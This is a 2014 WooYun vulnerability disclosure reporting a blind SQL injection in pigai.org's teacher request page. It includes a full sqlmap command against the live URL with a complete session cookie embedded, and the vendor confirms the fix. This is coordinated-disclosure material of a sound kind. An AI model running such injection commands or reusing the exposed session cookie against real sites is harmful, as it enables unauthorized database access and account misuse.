当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074079

漏洞标题:句酷批改网主站SQL盲注

相关厂商:pigai.org

漏洞作者: 进击的zjx

提交时间:2014-08-27 17:19

修复时间:2014-10-11 17:20

公开时间:2014-10-11 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-08-27: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向核心白帽子及相关领域专家公开
2014-09-16: 细节向普通白帽子公开
2014-09-26: 细节向实习白帽子公开
2014-10-11: 细节向公众公开

简要描述:

首先,句酷管理员跟我联系了,说下午有个天津的IP在扫他们,所以把IP给封了,很可能是审核大人的。。。请您换个IP,跑我给您的地址吧

详细说明:

首先说明是可以连上的,连不上是因为IP被封了

34.jpg


http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 ID是注入点
再次申明,需要登陆教师身份,才可以连接上
我直接给您cookie
sqlmap.py -u "http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5" --cookie "old=2011; _JUKU_USER=%7B%22i%22%3A%222648072%22%2C%22u%22%3A%22testxss2%40126.com%22%2C%22u2%22%3A%22%5Cu5f20%5Cu5206%22%2C%22k%22%3A%220fad2b75cb8020f7118233a21042cebd%22%2C%22img%22%3A%22%22%2C%22ts%22%3A1%2C%22s%22%3A%22%5Cu6e05%5Cu534e%5Cu5927%5Cu5b66%22%7D; _JKU=testxss2%40126.com; pgv_pvi=3833861510; Hm_lvt_3f46f9c09663bf0ac2abdeeb95c7e516=1408948744,1409040414,1409055933; old=2011; Hm_lpvt_3f46f9c09663bf0ac2abdeeb95c7e516=1409110501; _JUKU_USER=%7B%22i%22%3A%222648072%22%2C%22u%22%3A%22testxss2%40126.com%22%2C%22u2%22%3A%22%5Cu5f20%5Cu5206%22%2C%22k%22%3A%220fad2b75cb8020f7118233a21042cebd%22%2C%22img%22%3A%22%22%2C%22ts%22%3A1%2C%22s%22%3A%22%5Cu6e05%5Cu534e%5Cu5927%5Cu5b66%22%7D; _JKU=testxss2%40126.com"

32.jpg


dba权限,不继续跑了

漏洞证明:

如上

修复方案:

你们家的最后一个SQL注入啦,请高rank走起

版权声明:转载请注明来源 进击的zjx@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-27 17:23

厂商回复:

没有通过的时候,已经补上了,礼物照常有

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-27 17:23 | 句酷批改网(乌云厂商)

    没有通过的时候,已经补上了,礼物照常有

  2. 2014-08-27 17:42 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    @句酷批改网 扫描工具已经上缴,维护网站的重任就交给你们啦!